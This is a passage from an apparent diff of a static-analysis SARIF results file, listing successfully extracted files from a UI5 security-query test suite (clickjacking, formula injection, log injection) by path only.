"message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 185 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : 